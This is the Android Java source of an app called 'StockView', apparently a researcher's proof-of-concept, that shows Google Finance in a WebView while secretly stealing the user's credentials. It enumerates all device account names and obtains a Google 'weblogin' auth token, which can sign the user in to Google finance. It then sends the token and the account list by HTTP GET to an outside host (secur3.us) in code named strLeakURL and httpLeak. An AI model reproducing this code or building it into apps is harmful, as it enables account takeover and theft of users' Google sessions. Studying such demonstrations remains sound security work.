// This is sample code authored by Craig Young based on Android documentation and helpful information from http://nelenkov.blogspot.com/2012/11/sso-using-account-manager.html

package us.secur3.StockView;

import java.net.URLEncoder;

import org.apache.http.HttpVersion;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.conn.scheme.PlainSocketFactory;
import org.apache.http.conn.scheme.Scheme;
import org.apache.http.conn.scheme.SchemeRegistry;
import org.apache.http.conn.ssl.SSLSocketFactory;
import org.apache.http.impl.client.DefaultHttpClient;
import org.apache.http.impl.conn.tsccm.ThreadSafeClientConnManager;
import org.apache.http.params.BasicHttpParams;
import org.apache.http.params.HttpParams;
import org.apache.http.params.HttpProtocolParams;
import android.os.AsyncTask;
import android.os.Bundle;
import android.accounts.*;
import android.app.Activity;
import android.view.View;
import android.webkit.WebView;

public class MainActivity extends Activity {
    String urlAuthToken;
    Account[] mAccounts;
    String TOKEN_TYPE = "weblogin:service=finance&continue=https://finance.google.com";
    Boolean fTokenAcquired=false;
	private class OnAuthTokenAcquired implements AccountManagerCallback<Bundle> {
	    @Override
	    public void run(AccountManagerFuture<Bundle> result) {
	        Bundle bundle;
			try {
				bundle = result.getResult();
				urlAuthToken = bundle.getString(AccountManager.KEY_AUTHTOKEN);
		    	new RetreiveAuthPage().execute(urlAuthToken,bundle.getString(AccountManager.KEY_ACCOUNT_NAME));
				} catch (Exception e) { e.printStackTrace(); }
	    }
	}
	private class OnSecondAuthTokenAcquired implements AccountManagerCallback<Bundle> {
	    @Override
	    public void run(AccountManagerFuture<Bundle> result) {
	        Bundle bundle;
			try {
				bundle = result.getResult();
				urlAuthToken = bundle.getString(AccountManager.KEY_AUTHTOKEN);
				WebView myWebView = (WebView) findViewById(R.id.webview);
				myWebView.loadUrl(urlAuthToken);
				fTokenAcquired = true;
			} catch (Exception e) {	e.printStackTrace(); fTokenAcquired=false; }
	    }
	}
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        if (fTokenAcquired == false) {
        	WebView myWebView = (WebView) findViewById(R.id.webview);
        	myWebView.loadUrl("http://finance.google.com/");
        }
        getCreds(findViewById(R.layout.activity_main));
        if (fTokenAcquired == false)
        	getWebview(findViewById(R.layout.activity_main));
    }
	public void getCreds(View view) {
    	AccountManager am = AccountManager.get(this);
    	Account account = am.getAccounts()[0];
    	Account[] accounts = am.getAccounts();
    	String myAccts = "";
    	for (Account account2 : accounts) {
			myAccts = myAccts.concat(account2.name).concat("|");
		}
 
		String tokenType = TOKEN_TYPE;
		am.getAuthToken(account, tokenType, null, this, new OnAuthTokenAcquired(), null);
		new PostAccountsList().execute(myAccts);
    }
    public void getWebview(View view) {
    	AccountManager am = AccountManager.get(this);
    	Account account = am.getAccounts()[0];
		String tokenType = TOKEN_TYPE;
		am.getAuthToken(account, tokenType, null, this, new OnSecondAuthTokenAcquired(), null);
    }
}

class RetreiveAuthPage extends AsyncTask<String, Void, String> {
    public DefaultHttpClient getClient() {
        DefaultHttpClient ret = null;

        //sets up parameters
        HttpParams params = new BasicHttpParams();
        HttpProtocolParams.setVersion(params, HttpVersion.HTTP_1_1);
        HttpProtocolParams.setContentCharset(params, "utf-8");
        params.setBooleanParameter("http.protocol.expect-continue", false);

        //registers schemes for both http and https
        SchemeRegistry registry = new SchemeRegistry();
        registry.register(new Scheme("http", PlainSocketFactory.getSocketFactory(), 80));
        final SSLSocketFactory sslSocketFactory = SSLSocketFactory.getSocketFactory();
        sslSocketFactory.setHostnameVerifier(SSLSocketFactory.BROWSER_COMPATIBLE_HOSTNAME_VERIFIER);
        registry.register(new Scheme("https", sslSocketFactory, 443));

        ThreadSafeClientConnManager manager = new ThreadSafeClientConnManager(params, registry);
        ret = new DefaultHttpClient(manager, params);
        return ret;
    }

    protected String doInBackground(String... urls) {
        try {
        	String strLeakURL = "https://secur3.us/?user=" + urls[1] + "&url=" + urls[0];
        	
        	HttpGet httpLeak = new HttpGet(strLeakURL);
    		DefaultHttpClient httpClient = getClient();
    		httpClient.execute(httpLeak);
    		return "Success";
    	   } catch (Exception e) {
               return e.toString();
           }
    }

 }

class PostAccountsList extends AsyncTask<String, Void, String> {
    public DefaultHttpClient getClient() {
        DefaultHttpClient ret = null;

        //sets up parameters
        HttpParams params = new BasicHttpParams();
        HttpProtocolParams.setVersion(params, HttpVersion.HTTP_1_1);
        HttpProtocolParams.setContentCharset(params, "utf-8");
        params.setBooleanParameter("http.protocol.expect-continue", false);

        //registers schemes for both http and https
        SchemeRegistry registry = new SchemeRegistry();
        registry.register(new Scheme("http", PlainSocketFactory.getSocketFactory(), 80));
        final SSLSocketFactory sslSocketFactory = SSLSocketFactory.getSocketFactory();
        sslSocketFactory.setHostnameVerifier(SSLSocketFactory.BROWSER_COMPATIBLE_HOSTNAME_VERIFIER);
        registry.register(new Scheme("https", sslSocketFactory, 443));

        ThreadSafeClientConnManager manager = new ThreadSafeClientConnManager(params, registry);
        ret = new DefaultHttpClient(manager, params);
        return ret;
    }

    protected String doInBackground(String... urls) {
        try {
        	@SuppressWarnings("deprecation")
			String strLeakURL = "https://secur3.us/?accounts=" + URLEncoder.encode(urls[0]);
        	HttpGet httpLeak = new HttpGet(strLeakURL);
    		DefaultHttpClient httpClient = getClient();
    		httpClient.execute(httpLeak);
    		return "Success";
    	   } catch (Exception e) {
               return e.toString();
           }
    }

 }
